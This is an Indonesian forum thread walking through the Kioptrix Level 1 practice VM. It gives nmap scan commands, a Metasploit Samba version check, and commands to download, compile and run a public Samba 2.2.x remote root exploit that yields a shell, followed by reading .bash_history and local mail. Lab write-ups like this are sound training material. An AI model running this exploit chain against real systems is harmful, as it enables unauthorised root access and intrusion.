![]() |
Pembahasan Kioptrix Level 1 : Samba Exploit - Printable Version +- BackBox Indonesia (https://www.backboxindonesia.or.id) +-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html) +--- Forum: Privilege Escalation (https://www.backboxindonesia.or.id/forum-19.html) +--- Thread: Pembahasan Kioptrix Level 1 : Samba Exploit (/thread-21.html) |
Pembahasan Kioptrix Level 1 : Samba Exploit - Aiden_ - 03-10-2016 ![]() Assalamualaikum... Kioptrix Level 1 : Samba Exploit - untuk kesempatan kali ini saya akan membahas bagaimana mengexploit samba yang ada pada kiotrix server, kioptrix server adalah vulnerable os yang digunakan untuk tujuan pembelajaran dalam hal pentesting. Tool Yang Dibutuhkan
Dalam mencari ip target, saya menggunakan nmap dengan parameter -sn untuk melakukan Ping scan agar dapat mencari host yg live Quote:root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24Scanning Service Pada Server Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter -sV untuk melakukan service version scanning Quote:root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128Scanning Samba Version Setelah melakukan service scanning kita lanjutkan dengan mencari versi dari samba yang sudah diinstall di kiotrix menggunakan modul auxiliary pada metasploit Quote:msf > search smb_version[*] Exploiting Samba Kita tidak perlu bingung mau menggunakan exploit apa, karena samba 2.2.x memiliki exploit yang sudah dibuat yaitu 0x333hate => samba 2.2.x remote root exploit, sebenar nya bisa juga dengan trans2open exploit di metasploit, tapi karena metasploit saya lagi error jadi saya make 0x333hate yang base on trans2open. ~# wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c ~# gcc 0x333hate.c -o xpl ~# ./xlp -t 192.168.33.1 kita sudah mendapatkan shell akses ke system kioptrix. [*] Ingat "Shell is Only the Beginning" , lalu apa yang harus dilakukan ? karena tidak ada clue, ane iseng mencari file .bash_history untuk melihat command apa aja yang pernah di ketik [*] Ada commad mail yang digunakan untuk email proses lalu tinggal ketik aja di shell nya Quote:# mail <-- untuk melihat list email [*] Rupa nya isi email tersebut agar kita bisa lanjut ke level 2 kiotrix nya ^_^ sekian tutorial sederhana dari saya. semoga dapat bermanfaat bagi kita semua dan mohon maaf apa bila ada salah pemberian definisi :D RE: Pembahasan Kioptrix Level 1 : Samba Exploit - teh - 03-10-2016 om ini install kioptrix nya di virtual yaa. . RE: Pembahasan Kioptrix Level 1 : Samba Exploit - Aiden_ - 03-11-2016 (03-10-2016, 02:50 PM)teh Wrote: om ini install kioptrix nya di virtual yaa. . iyaa bang harus itu RE: Pembahasan Kioptrix Level 1 : Samba Exploit - teh - 03-11-2016 okee siip ane test dlu dah :D |